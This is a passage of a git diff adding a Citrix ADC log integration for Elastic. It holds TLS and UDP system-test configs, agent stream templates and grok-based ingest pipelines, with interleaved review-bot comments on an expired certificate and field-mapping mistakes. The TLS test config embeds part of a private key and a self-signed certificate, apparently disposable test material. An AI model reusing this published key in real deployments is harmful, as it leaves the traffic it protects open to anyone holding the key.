+ JRaSaPT8sdxVUcXsRoxgLJu+vwPQke1koMN4YRbwuQKBgQDJiZ/WSeqa5oIqkXbn
+ hjm7RXKaf2oE1U/bNjdSFtdEP7T4vUvvr7Hq2f/jiBLtCE7w16PJjKx9iIq2+jMl
+ qIY43Sk9bdi5FxtYTHda0hwrbH274P+QVcVs5PXCT0TGktOleHGBlXaaPrxl9iCh
+ 8tmmxZZYa5aQxEO/lxB9xQKaiQ==
+ -----END PRIVATE KEY-----
+ certificate: |
+ -----BEGIN
CERTIFICATE-----
+ MIIDazCCAlOgAwIBAgIUW5TDu1tJMY2Oa7PsL+BQSmeWqz0wDQYJKoZIhvcNAQEL
+ BQAwRTELMAkGA1UEBhMCVVMxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
+ GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yMTEwMDEwNTAwMjNaFw0yMTEw
+ MDIwNTAwMjNaMEUxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
+ HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
+ AQUAA4IBDwAwggEKAoIBAQDhCLvLsQAHufsNU+u1x/CequAUphfXZqLhDo2Eo/ho
+ lfBS0+ey4bnzPL6lS9NFL5JkLQA2gYESqsXU/Ru8E76Az1egzMwT3TVAPLVU8Nbr
+ xBqeNiQa2m9wC37HQy4qC9OxL28LUoKtFjxScD1sa0oikXCJN1a3BSoAf9iiZ/dx
+ z4WVfrNhrzq2JFXjravY84n5ujkZOg45Pg704vHOeg0rBbIoSNfjDUVZWjwC95K1
+ BMN3msOTL9juv/EDa6BujqCxl+G1nY7JPFDLSHWis65p+1AAa5xieYDb47vyJ0SS
+ R7lEURTXZOkkM6k5JWfgkATEmGzRxPkOloITXg9ag1OlAgMBAAGjUzBRMB0GA1Ud
+ DgQWBBRYUSKDHBBE9Q6fTeTqogicCxcXwDAfBgNVHSMEGDAWgBRYUSKDHBBE9Q6f
+ TeTqogicCxcXwDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBc
+ T8B+GpvPy9NQ700LsywRPY0L9IJCKiu6j3TP1tqqSPjAC/cg9ac+bFXuWOu7V+KJ
+ s09Q/pItq9SLX6UvnfRzTxu5lCBwwGX9cL131mTIu5SmFo7Eks+sorbiIarWDMoC
+ e+9An3GFpagW+YhOt4BdIM5lTqoeodzganDBsOUZI9aDAj2Yo5h2O7r6Wd12cb6T
+ mz8vMfB2eG8BxU20ZMfkdERWjiyXHOSBQqeqfkV8d9370gMu5RcJNcIgnbmTRdho
+ X3HJFiimZVaNjXATqmC/y2A1KXvJdamPLy3mGXkW2cFLoPCdK2OZFUHqiuc1bigA
+ qEf55SihFqErRMeURPPF
+ -----END CERTIFICATE-----
diff --git a/packages/citrix_adc/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/citrix_adc/data_stream/log/_dev/test/system/test-udp-config.yml
new file mode 100644
index 00000000000..7d2de584d02
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/_dev/test/system/test-udp-config.yml
@@ -0,0 +1,8 @@
+service: citrix-adc-udp
+service_notify_signal: SIGHUP
+input: udp
+data_stream:
+ vars:
+ listen_address: 0.0.0.0
+ listen_port: 9560
+ preserve_original_event: true
diff --git a/packages/citrix_adc/data_stream/log/agent/stream/stream.yml.hbs b/packages/citrix_adc/data_stream/log/agent/stream/stream.yml.hbs
new file mode 100644
index 00000000000..9d63bee11f5
--- /dev/null
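Review bot: The `certificate` block in test-tls-config.yml carries a validity window that, if I decode the ASN.1 `Fw0yMTEwMDEwNTAwMjNaFw0yMTEwMDIwNTAwMjNa` correctly, runs from 2021-10-01 to 2021-10-02, a single day that has long expired, so this system test can only pass if the sending side does not verify the server certificate; that dependency should be stated in a comment above `ssl:`. The committed private key also deserves a one-line comment so secret scanners and future readers can see it is disposable, e.g. `# Throwaway self-signed key pair generated for this system test only; it protects nothing and must never be reused.` If the pair is regenerated later, giving it a long validity and noting the generation command in the same comment would keep the fixture from becoming a hidden verification-dependent failure.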
+++ b/packages/citrix_adc/data_stream/log/agent/stream/stream.yml.hbs
@@ -0,0 +1,29 @@
+paths:
+{{#each paths as |path|}}
+ - {{path}}
+{{/each}}
+exclude_files: [".gz$"]
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#if preserve_duplicate_custom_fields}}
+ - preserve_duplicate_custom_fields
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+processors:
+- add_locale: ~
+{{#if processors}}
+{{processors}}
+{{/if}}
+{{#if tz_offset}}
+fields_under_root: true
+fields:
+ _conf:
+ tz_offset: {{tz_offset}}
+{{/if}}
diff --git a/packages/citrix_adc/data_stream/log/agent/stream/tcp.yml.hbs b/packages/citrix_adc/data_stream/log/agent/stream/tcp.yml.hbs
new file mode 100644
index 00000000000..0e3d7517cb5
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/agent/stream/tcp.yml.hbs
@@ -0,0 +1,31 @@
+host: "{{listen_address}}:{{listen_port}}"
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#if preserve_duplicate_custom_fields}}
+ - preserve_duplicate_custom_fields
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if ssl}}
+ssl: {{ssl}}
+{{/if}}
+processors:
+- add_locale: ~
+{{#if processors}}
+{{processors}}
+{{/if}}
+{{#if tcp_options}}
+{{tcp_options}}
+{{/if}}
+{{#if tz_offset}}
+fields_under_root: true
+fields:
+ _conf:
+ tz_offset: {{tz_offset}}
+{{/if}}
diff --git a/packages/citrix_adc/data_stream/log/agent/stream/udp.yml.hbs b/packages/citrix_adc/data_stream/log/agent/stream/udp.yml.hbs
new file mode 100644
index 00000000000..307fbc95502
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/agent/stream/udp.yml.hbs
@@ -0,0 +1,28 @@
+host: "{{listen_address}}:{{listen_port}}"
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#if preserve_duplicate_custom_fields}}
+ - preserve_duplicate_custom_fields
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+processors:
+- add_locale: ~
+{{#if processors}}
+{{processors}}
+{{/if}}
+{{#if udp_options}}
+{{udp_options}}
+{{/if}}
+{{#if tz_offset}}
+fields_under_root: true
+fields:
+ _conf:
+ tz_offset: {{tz_offset}}
+{{/if}}
diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/alg_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/alg_feature.yml
new file mode 100644
index 00000000000..a658fc9a77d
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/alg_feature.yml
@@ -0,0 +1,186 @@ +--- +description: Pipeline for Citrix Native messages of ALG feature. +processors: + - grok: + description: Extract fields from message of ALG feature. + tag: grok_alg_feature + field: citrix.extended.message + patterns: + - '^Errmsg%{SPACE}:%{SPACE}\"%{GREEDYDATA:citrix_adc.log.errmsg}\" - Group%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.group} - Call_ID%{SPACE}:%{SPACE}%{NOTSPACE:citrix_adc.log.call_id} - Transport%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.transport} - Source_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.source.ip} - Source_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.source.port} - Destination_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.destination.ip} - Destination_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.destination.port} - Natted_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.natted.ip} - Natted_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.natted.port} - Method%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.method} - Sequence_Number%{SPACE}:%{SPACE}%{INT:citrix_adc.log.sequence_number} - Register%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.register} - Content_Type%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.content_type} - Error%{SPACE}:%{SPACE}\"%{DATA:citrix_adc.log.error}\" - Error_line%{SPACE}:%{SPACE}\"%{DATA:citrix_adc.log.error_line}\" - Caller_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.caller.user_name} - Callee_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.callee.user_name} - Caller_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.caller.domain_name} - Callee_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.callee.domain_name} -$' + - '^Errmsg%{SPACE}:%{SPACE}\"%{GREEDYDATA:citrix_adc.log.errmsg}\" - Group%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.group} - Call_ID%{SPACE}:%{SPACE}%{NOTSPACE:citrix_adc.log.call_id} - Transport%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.transport} - Source_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.source.ip} - Source_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.source.port} - Destination_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.destination.ip} - 
Destination_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.destination.port} - Natted_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.natted.ip} - Natted_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.natted.port} - Method%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.method} - Sequence_Number%{SPACE}:%{SPACE}%{INT:citrix_adc.log.sequence_number} - Register%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.register} - Content_Type%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.content_type} - Caller_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.caller.user_name} - Callee_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.callee.user_name} - Caller_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.caller.domain_name} - Callee_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.callee.domain_name}$' + - '^Errmsg%{SPACE}:%{SPACE}\"%{GREEDYDATA:citrix_adc.log.errmsg}\" - Error_Code%{SPACE}:%{SPACE}%{INT:citrix_adc.log.error_code} - Group%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.group}$' + - '^Infomsg%{SPACE}:%{SPACE}\"%{GREEDYDATA:citrix_adc.log.infomsg}\" - Group%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.group} - Session_ID%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.session_id} -$' + - '^Infomsg%{SPACE}:%{SPACE}\"%{GREEDYDATA:citrix_adc.log.infomsg}\" - Group%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.group} - Call_ID%{SPACE}:%{SPACE}%{NOTSPACE:citrix_adc.log.call_id} - Transport%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.transport} - Source_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.source.ip} - Source_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.source.port} - Destination_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.destination.ip} - Destination_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.destination.port} - Natted_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.natted.ip} - Natted_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.natted.port} - Method%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.method} - Sequence_Number%{SPACE}:%{SPACE}%{INT:citrix_adc.log.sequence_number} - Register%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.register} - 
Content_Type%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.content_type} - Caller_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.caller.user_name} - Callee_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.callee.user_name} - Caller_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.caller.domain_name} - Callee_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.callee.domain_name} -$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: citrix_adc.log.destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.natted.ip + tag: convert_natted_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.natted?.ip != null && ctx.citrix_adc.log.natted.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.nat.ip + tag: set_destination_nat_ip_from_natted_ip + copy_from: citrix_adc.log.natted.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.natted.port + tag: convert_natted_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed 
with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.nat.port + tag: set_destination_nat_port_from_natted_port + copy_from: citrix_adc.log.natted.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.port + tag: convert_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_destination_port + copy_from: citrix_adc.log.destination.port + ignore_empty_value: true + - set: + field: destination.user.domain + tag: set_destination_user_domain_from_callee_domain_name + copy_from: citrix_adc.log.callee.domain_name + ignore_empty_value: true + - set: + field: destination.user.name + tag: set_destination_user_name_from_callee_user_name + copy_from: citrix_adc.log.callee.user_name + ignore_empty_value: true + - convert: + field: citrix_adc.log.error_code + tag: convert_error_code_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: error.code + tag: set_error_code_from_error_code + copy_from: citrix_adc.log.error_code + ignore_empty_value: true + - set: + field: error.message + tag: set_error_message_from_errmsg + copy_from: citrix_adc.log.errmsg + ignore_empty_value: true + - set: + field: group.name + tag: set_group_name_from_group + copy_from: citrix_adc.log.group + ignore_empty_value: true + - set: + field: http.request.method + tag: set_http_request_method_from_method + copy_from: citrix_adc.log.method + ignore_empty_value: true 
+ - set: + field: message + tag: set_message_from_infomsg + copy_from: citrix_adc.log.infomsg + ignore_empty_value: true + - set: + field: network.transport + tag: set_network_transport_from_transport + copy_from: citrix_adc.log.transport + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.port + tag: convert_source_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_source_port + copy_from: citrix_adc.log.source.port + ignore_empty_value: true + - set: + field: source.user.domain + tag: set_source_user_domain_from_caller_domain_name + copy_from: citrix_adc.log.caller.domain_name + ignore_empty_value: true + - set: + field: source.user.name + tag: set_source_user_name_from_caller_user_name + copy_from: citrix_adc.log.caller.user_name + ignore_empty_value: true + - convert: + field: citrix_adc.log.sequence_number + tag: convert_sequence_number_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline 
{{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.session_id + tag: convert_session_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/appfw_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/appfw_feature.yml new file mode 100644 index 00000000000..ad163fdebba --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/appfw_feature.yml 
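Review bot: The `set` processor tagged `set_error_message_from_errmsg` overwrites `error.message`, but the `convert` processors that run before it (`convert_destination_ip_to_ip`, `convert_natted_port_to_long`, …) `append` their failures to that same field, so a conversion error is silently discarded whenever the event also carries an Errmsg; use `- append:` / `field: error.message` / `value: '{{{citrix_adc.log.errmsg}}}'` guarded with `if: ctx.citrix_adc?.log?.errmsg != null` so both survive. The Method value captured by these patterns sits beside Call_ID, Register and Transport, which reads as SIP signalling rather than HTTP, so `set_http_request_method_from_method` copying it into `http.request.method` looks like the wrong ECS target; if that is confirmed, keep the value only under `citrix_adc.log.method`. The `%{USER}` captures for caller and callee names will not match names containing spaces, in which case the whole line falls through to the `citrix_adc.log.message` catch-all; worth a comment above `patterns:` so the fallback is understood as intended.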
@@ -0,0 +1,178 @@ +--- +description: Pipeline for Citrix Native messages of APPFW feature. +processors: + - grok: + description: Extract fields from message of APPFW feature. + tag: grok_appfw_feature + field: citrix.extended.message + patterns: + - '^XML%{SPACE}Mismatched%{SPACE}content-type%{SPACE}in%{SPACE}HTTP%{SPACE}header%{SPACE}detected%{SPACE}=%{SPACE}\"%{GREEDYDATA:citrix_adc.log.content_type_mismatch}\"\.$' + - '^Disallow%{SPACE}Deny%{SPACE}URL%{SPACE}for%{SPACE}rule%{SPACE}pattern%{SPACE}=%{SPACE}\"%{GREEDYDATA:citrix_adc.log.url}\"\.$' + - '^Unknown%{SPACE}content-type%{SPACE}header%{SPACE}value%{SPACE}=%{SPACE}\"%{GREEDYDATA:citrix_adc.log.unknown_content_type}\"\.$' + - "^parsing%{SPACE}referer%{SPACE}header%{SPACE}\\'%{GREEDYDATA:citrix_adc.log.referer_header}\\'%{SPACE}failed$" + - '^URL%{SPACE}length\(%{NUMBER:citrix_adc.log.url_length:int}\)%{SPACE}is%{SPACE}greater%{SPACE}than%{SPACE}maximum%{SPACE}allowed\(%{NUMBER:citrix_adc.log.max_allowed.url_length:int}\)\.$' + - '^Cookie%{SPACE}header%{SPACE}length\(%{NUMBER:citrix_adc.log.cookie_header_length:int}\)%{SPACE}is%{SPACE}greater%{SPACE}than%{SPACE}maximum%{SPACE}allowed\(%{NUMBER:citrix_adc.log.max_allowed.cookie_header_length:int}\)\.$' + - '^Header\(Referer\)%{SPACE}length\(%{NUMBER:citrix_adc.log.header_length:int}\)%{SPACE}is%{SPACE}greater%{SPACE}than%{SPACE}maximum%{SPACE}allowed\(%{NUMBER:citrix_adc.log.max_allowed.header_length:int}\)\.$' + - '^Query%{SPACE}string%{SPACE}length\(%{NUMBER:citrix_adc.log.query_string_length:int}\)%{SPACE}is%{SPACE}greater%{SPACE}than%{SPACE}maximum%{SPACE}allowed\(%{NUMBER:citrix_adc.log.max_allowed.query_string_length:int}\)\.$' + - '^Total%{SPACE}HTTP%{SPACE}header%{SPACE}length\(%{NUMBER:citrix_adc.log.total_http_header_length:int}\)%{SPACE}is%{SPACE}greater%{SPACE}than%{SPACE}maximum%{SPACE}allowed\(%{NUMBER:citrix_adc.log.max_allowed.total_http_header_length:int}\)\.$' + - '^Profile%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.profile}$' + - 
'^Field%{SPACE}Type%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.field_type}$' + - '^Field%{SPACE}Name%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.field_name}$' + - '^Content%{SPACE}length%{SPACE}is%{SPACE}too%{SPACE}large\(%{NUMBER:citrix_adc.log.content_length_bytes:long}%{SPACE}Bytes\).%{SPACE}Memory%{SPACE}Allocation%{SPACE}failed.$' + - '^Signature%{SPACE}id%{SPACE}%{NUMBER:citrix_adc.log.signature_id:int}%{SPACE}contains%{SPACE}no%{SPACE}fast%{SPACE}match%{SPACE}pattern$' + - '^Appfw%{SPACE}maximum%{SPACE}session%{SPACE}Limit%{SPACE}reached%{SPACE}for%{SPACE}PEID%{SPACE}%{NUMBER:citrix_adc.log.peid:int}$' + - '^APPFW%{SPACE}RFC%{SPACE}Profile:%{SPACE}%{GREEDYDATA:citrix_adc.log.appfw_rfc_profile}$' + - '^New%{SPACE}signature%{SPACE}available%{SPACE}:%{SPACE}RuleID%{SPACE}=%{SPACE}%{NUMBER:citrix_adc.log.rule_id:int}$' + - '^Learned%{SPACE}rule%{SPACE}will%{SPACE}be%{SPACE}auto-deployed%{SPACE}after%{SPACE}%{NUMBER:citrix_adc.log.auto_deploy_mins:int}mins.%{SPACE}ViolType%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.violation_type}.%{SPACE}Profile%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.profile}$' + - '^Rest%{SPACE}Validation%{SPACE}relaxation%{SPACE}rule%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.rule}%{SPACE}hit%{SPACE}at%{SPACE}url%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.url}$' + - '^gRPC%{SPACE}Validation%{SPACE}relaxation%{SPACE}rule%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.rule}%{SPACE}hit%{SPACE}at%{SPACE}url%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.url}$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - set: + field: http.request.referrer + tag: set_http_request_referrer_from_referer_header + copy_from: citrix_adc.log.referer_header + ignore_empty_value: true + - convert: + field: citrix_adc.log.rule_id + tag: convert_rule_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in 
pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: rule.id + tag: set_rule_id_from_rule_id + copy_from: citrix_adc.log.rule_id + ignore_empty_value: true + - set: + field: url.original + tag: set_url_original_from_url + copy_from: citrix_adc.log.url + ignore_empty_value: true + - convert: + field: citrix_adc.log.peid + tag: convert_peid_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.signature_id + tag: convert_signature_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.url_length + tag: convert_url_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.max_allowed.url_length + tag: convert_max_allowed_url_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.cookie_header_length + tag: convert_cookie_header_length_to_long + type: long + 
ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.max_allowed.cookie_header_length + tag: convert_max_allowed_cookie_header_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.header_length + tag: convert_header_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.max_allowed.header_length + tag: convert_max_allowed_header_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.query_string_length + tag: convert_query_string_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.max_allowed.query_string_length + tag: 
convert_max_allowed_query_string_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_http_header_length + tag: convert_total_http_header_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.max_allowed.total_http_header_length + tag: convert_max_allowed_total_http_header_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.content_length_bytes + tag: convert_content_length_bytes_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/bot_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/bot_feature.yml new file mode 100644 index 00000000000..0fe81be6652 --- /dev/null 
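Review bot: The `Disallow%{SPACE}Deny%{SPACE}URL%{SPACE}for%{SPACE}rule%{SPACE}pattern` grok captures the firewall rule's own pattern into `citrix_adc.log.url`, and `set_url_original_from_url` then copies it into `url.original`; that value is a rule expression, not a requested URL, so it pollutes `url.original` for any detection or dashboard keyed on it, whereas the Rest/gRPC relaxation-rule patterns do carry a real URL. Capturing it as `%{GREEDYDATA:citrix_adc.log.rule_pattern}` instead keeps `url.original` meaningful. Separately, the patterns already cast with `:int`/`:long` (`url_length`, `cookie_header_length`, `content_length_bytes`, …) and a `convert ... type: long` then runs on each of the same fields, so one of the two is redundant; pick one so casting happens once. Several literal dots are unescaped (`mins.%{SPACE}ViolType`, `Bytes).%{SPACE}Memory`) and match any character.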
+++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/bot_feature.yml
